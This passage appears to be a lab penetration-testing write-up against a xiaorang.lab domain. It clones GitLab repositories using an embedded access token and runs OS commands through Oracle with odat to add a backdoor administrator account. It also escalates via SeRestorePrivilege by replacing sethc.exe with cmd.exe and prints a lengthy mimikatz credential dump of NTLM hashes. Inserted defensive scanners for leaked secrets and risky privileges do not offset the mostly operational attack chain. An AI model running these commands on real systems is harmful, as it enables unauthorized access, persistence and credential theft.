    "description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
    "name": "Monitoring",
    "name_with_namespace": "GitLab Instance / Monitoring",
    "path": "Monitoring",
    "path_with_namespace": "gitlab-instance-23352f48/Monitoring",
    "created_at": "2022-12-25T07:18:20.914Z",
    "default_branch": "main",
    "tag_list": [ ],
    "topics": [ ],
    "ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
    "http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
    "web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
    "readme_url": null,
    "avatar_url": null,
    "forks_count": 0,
    "star_count": 0,
    "last_activity_at": "2022-12-25T07:18:20.914Z",
    "namespace": {
      "id": 2,
      "name": "GitLab Instance",
      "path": "gitlab-instance-23352f48",
      "kind": "group",
      "full_path": "gitlab-instance-23352f48",
      "parent_id": null,
      "avatar_url": null,
      "web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
    },
    "_links": {
      "self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
      "issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
      "merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
      "repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
      "labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
      "events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
      "members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
      "cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
    },
    "packages_enabled": true,
    "empty_repo": true,
    "archived": false,
    "visibility": "internal",
    "resolve_outdated_diff_discussions": false,
    "container_expiration_policy": {
      "cadence": "1d",
      "enabled": false,
      "keep_n": 10,
      "older_than": "90d",
      "name_regex": ".*",
      "name_regex_keep": null,
      "next_run_at": "2022-12-26T07:18:21.108Z"
    },
    "issues_enabled": true,
    "merge_requests_enabled": true,
    "wiki_enabled": true,
    "jobs_enabled": true,
    "snippets_enabled": true,
    "container_registry_enabled": true,
    "service_desk_enabled": false,
    "can_create_merge_request_in": true,
    "issues_access_level": "enabled",
    "repository_access_level": "enabled",
    "merge_requests_access_level": "enabled",
    "forking_access_level": "enabled",
    "wiki_access_level": "enabled",
    "builds_access_level": "enabled",
    "snippets_access_level": "enabled",
    "pages_access_level": "private",
    "operations_access_level": "enabled",
    "analytics_access_level": "enabled",
    "container_registry_access_level": "enabled",
    "security_and_compliance_access_level": "private",
    "releases_access_level": "enabled",
    "environments_access_level": "enabled",
    "feature_flags_access_level": "enabled",
    "infrastructure_access_level": "enabled",
    "monitor_access_level": "enabled",
    "emails_disabled": null,
    "shared_runners_enabled": true,
    "lfs_enabled": true,
    "creator_id": 1,
    "import_status": "none",
    "open_issues_count": 0,
    "ci_default_git_depth": 20,
    "ci_forward_deployment_enabled": true,
    "ci_job_token_scope_enabled": false,
    "ci_separated_caches": true,
    "ci_opt_in_jwt": false,
    "ci_allow_fork_pipelines_to_run_in_parent_project": true,
    "public_jobs": true,
    "build_timeout": 3600,
    "auto_cancel_pending_pipelines": "enabled",
    "ci_config_path": null,
    "shared_with_groups": [ ],
    "only_allow_merge_if_pipeline_succeeds": false,
    "allow_merge_on_skipped_pipeline": null,
    "restrict_user_defined_variables": false,
    "request_access_enabled": true,
    "only_allow_merge_if_all_discussions_are_resolved": false,
    "remove_source_branch_after_merge": true,
    "printing_merge_request_link_enabled": true,
    "merge_method": "merge",
    "squash_option": "default_off",
    "enforce_auth_checks_on_uploads": true,
    "suggestion_commit_message": null,
    "merge_commit_template": null,
    "squash_commit_template": null,
    "issue_branch_template": null,
    "auto_devops_enabled": true,
    "auto_devops_deploy_strategy": "continuous",
    "autoclose_referenced_issues": true,
    "keep_latest_artifact": true,
    "runner_token_expiration_interval": null,
    "permissions": {
      "project_access": null,
      "group_access": null
    }
  }
]

Pull down these projects and take a look.

proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git

There is a pile of usernames and passwords.

The password was found in the xradmin repository.

url: 172.22.14.31:1521/orcl  
username: xradmin
password: fcMyE8t9E4XdsKf
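Credentials committed to a repository are found the same way by an attacker holding a token and by a defender running a secret scanner in CI. As an added example, not code from the page or from any of the repositories, here is a small scanner with rules for the kinds of secrets that turned up here: a GitLab personal access token embedded in a clone URL, a password assignment, a database connection URL, and a "host | user | password" table row. The file paths and the clean config file are constructed; the rules and the allow-list for environment-variable references are my own.

```python
import re

# Detection rules, constructed for this example.
RULES = {
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_-]{20,}"),
    "password_assignment": re.compile(r"(?i)\bpassword\s*[:=]\s*['\"]?[^\s'\"]+"),
    "db_connection_url": re.compile(r"(?i)\burl\s*[:=]\s*\S+:\d{2,5}/\w+"),
    # Three pipe-separated columns on one line, the layout of the account list found here.
    "credential_table_row": re.compile(r"^\s*[^|\s]\S*\s*\|\s*\S+\s*\|\s*\S+\s*$"),
}
# A value that points at an environment variable or secret store is the right practice, not a leak.
_INDIRECT = re.compile(r"\$\{[^}]*\}|\$[A-Z_][A-Z0-9_]*|process\.env\.|os\.environ")


def scan_text(path, text):
    """Return one finding per (line, rule) hit; the secret itself is not copied into the report."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if _INDIRECT.search(line):
            continue
        for rule, pattern in RULES.items():
            if pattern.search(line):
                findings.append({"file": path, "line": lineno, "rule": rule})
    return findings


def scan_repo(files):
    """files: mapping of path -> content, e.g. built by walking a checkout."""
    findings = []
    for path, text in sorted(files.items()):
        findings.extend(scan_text(path, text))
    return findings


# Constructed checkout: hypothetical paths, with the credential material shown in this writeup
# placed where such material typically ends up, plus one correctly written config file.
SAMPLE_REPO = {
    "xradmin/src/main/resources/application.yml":
        "url: 172.22.14.31:1521/orcl\nusername: xradmin\npassword: fcMyE8t9E4XdsKf\n",
    "internal-secret/accounts.md":
        "# machine | account | password\nXR-0923 | zhangshuai | wSbEajHzZs\n",
    "awenode/deploy.sh":
        "git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git\n",
    "awenode/config.js":
        "const dbPassword = process.env.DB_PASSWORD;\n",
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print(f"{f['file']}:{f['line']}: {f['rule']}")
```

Run as a pre-receive hook or CI job, a scanner like this blocks the commit before the token or password is ever reachable through the API; the findings deliberately carry file, line and rule only, so the report itself does not become another copy of the secret.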

Found a tool, odat, for exploiting Oracle; use it to execute commands.

proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user ocean admin@123 /add'
proxychains4 ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators ocean /add'

But the ARM build of Kali does not have this tool, so let's look at the other things first.

I downloaded one onto a cloud server and it worked from there.

In the usernames and passwords above, one column of machine names looks similar to the hosts fscan found.

XR-0923 | zhangshuai | wSbEajHzZs

First RDP over and take a look.

This user is able to log in remotely.

SeRestorePrivilege privilege escalation

proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

Interesting, the WinRM session has one extra privilege; SeRestorePrivilege can be used to escalate.

SeRestorePrivilege grants write access to every object on the system, regardless of its ACL.
Three ways to abuse the privilege:

ren sethc.exe sethc.bak 
ren cmd.exe sethc.exe
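Before granting or reviewing remote-management access, a defender wants to know which token privileges a user actually holds, because the ones listed below allow exactly the kind of escalation shown here. The following is an added example, not part of the original writeup: it parses `whoami /priv` output and reports every high-risk privilege present, enabled or not. The privilege table is my own selection; the sample output is constructed.

```python
import re

# Privileges that let their holder read or write arbitrary objects or become SYSTEM,
# regardless of ACLs. A WinRM/RDP-only user should hold none of them.
HIGH_RISK_PRIVILEGES = {
    "SeRestorePrivilege": "write any file or registry key, bypassing ACLs",
    "SeBackupPrivilege": "read any file, bypassing ACLs",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate client tokens",
    "SeAssignPrimaryTokenPrivilege": "replace a process-level token",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# One row of `whoami /priv`: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Map privilege name -> True if currently enabled, False if present but disabled."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def audit_privileges(text):
    """List (name, why it matters, enabled) for every high-risk privilege the token holds.

    A 'Disabled' state is not a mitigation: the holder can turn it on at will with
    AdjustTokenPrivileges, so presence alone is the finding.
    """
    privs = parse_whoami_priv(text)
    return sorted(
        (name, HIGH_RISK_PRIVILEGES[name], enabled)
        for name, enabled in privs.items()
        if name in HIGH_RISK_PRIVILEGES
    )


# Constructed `whoami /priv` output for a low-privileged user that was nevertheless
# granted "Restore files and directories" through local security policy.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeRestorePrivilege            Restore files and directories        Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
"""

if __name__ == "__main__":
    for name, why, enabled in audit_privileges(SAMPLE_WHOAMI_PRIV):
        state = "enabled" if enabled else "disabled"
        print(f"{name} ({state}): {why}")
```

The same check belongs in the review of "Restore files and directories" and "Back up files and directories" user-rights assignments in group policy: membership in those rights is what put the privilege on this user's token in the first place.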

Privilege escalation succeeded. Now let's dump the hashes.

For convenience, add a backdoor user first; the machine account's hash was captured.

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 5971088 (00000000:005b1c90)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 5970395 (00000000:005b19db)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 5969701 (00000000:005b1725)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 19:32:26
SID : S-1-5-96-0-3
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 3150114 (00000000:00301122)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 3150084 (00000000:00301104)
Session : RemoteInteractive from 2
User Name : zhangshuai
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:13:09
SID : S-1-5-21-754105099-1176710061-2177073800-1001
msv :
[00000003] Primary
* Username : zhangshuai
* Domain : XR-0923
* NTLM : f97d5a4b44b11bc257a63c3f76f18a9a
* SHA1 : f6ff2714d556240436758527e190e329f05cd43d
tspkg :
wdigest :
* Username : zhangshuai
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : zhangshuai
* Domain : XR-0923
* Password : wSbEajHzZs
ssp :
credman :
cloudap :

Authentication Id : 0 ; 3108560 (00000000:002f6ed0)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 64330 (00000000:0000fb4a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 8519c5a89b2cd4d679a5a36f26863e5d
* SHA1 : 42d8188bc30ff0880b838e368c6e5522b86f978d
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
ssp :
credman :
cloudap :

Authentication Id : 0 ; 64312 (00000000:0000fb38)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XR-0923$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-0923$
* Domain : XIAORANG.LAB
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 32395 (00000000:00007e8b)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID :
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :

Authentication Id : 0 ; 5985359 (00000000:005b544f)
Session : RemoteInteractive from 3
User Name : ocean
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:32:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : ocean
* Domain : XR-0923
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : ocean
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : ocean
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 5985329 (00000000:005b5431)
Session : RemoteInteractive from 3
User Name : ocean
Domain : XR-0923
Logon Server : XR-0923
Logon Time : 2025/3/10 19:32:27
SID : S-1-5-21-754105099-1176710061-2177073800-1002
msv :
[00000003] Primary
* Username : ocean
* Domain : XR-0923
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : ocean
* Domain : XR-0923
* Password : (null)
kerberos :
* Username : ocean
* Domain : XR-0923
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 3109913 (00000000:002f7419)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 3109437 (00000000:002f723d)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/10 19:13:08
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
* Password : 18 77 1d d8 f8 70 90 6d df 7b 30 47 4d 9d b7 7d 8e 84 8a 85 57 e9 68 44 69 f5 01 a2 27 f6 d2 05 95 83 45 86 54 82 7d 6c 17 58 0b 38 04 af ff a6 ff ec 01 87 77 22 7c f6 bf 43 72 88 14 5b c5 9c dd 34 62 5c dd 7b c5 82 9c 10 16 9b 25 fa d6 cb d3 2d 9f 8b f3 f4 9d 8f 3b 64 2f b8 b1 44 5b f5 b0 87 2d bc e0 11 50 c3 23 12 75 f6 32 7b a7 8e ce b7 3d 89 b1 56 12 c5 7e cc 60 98 5d c7 7d 4d 45 6e fd c3 65 41 ba 8a fe 7e fb f8 79 ca 60 f7 4e be bc 62 04 71 47 15 ea 19 f0 ad 00 f7 39 7a b1 01 f6 bf e6 c1 33 a8 bf 0b 7d 4c 0f 54 cb 0b 40 28 6e 3d 3e d9 19 8e 44 4e 2e 62 28 76 78 d2 d3 57 ec 9f 12 d7 bc 51 56 88 ed 67 99 4f 09 01 49 b3 e0 02 33 6e 26 31 c3 53 a7 bd 79 20 2e 17 ed 11 c4 d7 a5 fc 31 0c 72 75 aa 8f 39 12 fd 7e
ssp :
credman :
cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/10 18:43:26
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/10 18:43:24
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :

Authentication Id : 0 ; 33498 (00000000:000082da)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/3/10 18:43:23
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : a4f432e39e79dc4ad8b85854ed243f61
* SHA1 : 2718b31174dc5fe2ae10f2aeecb08af8fbf4fd1f
tspkg :
wdigest :
* Username : XR-0923$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-0923$
* Domain : xiaorang.lab
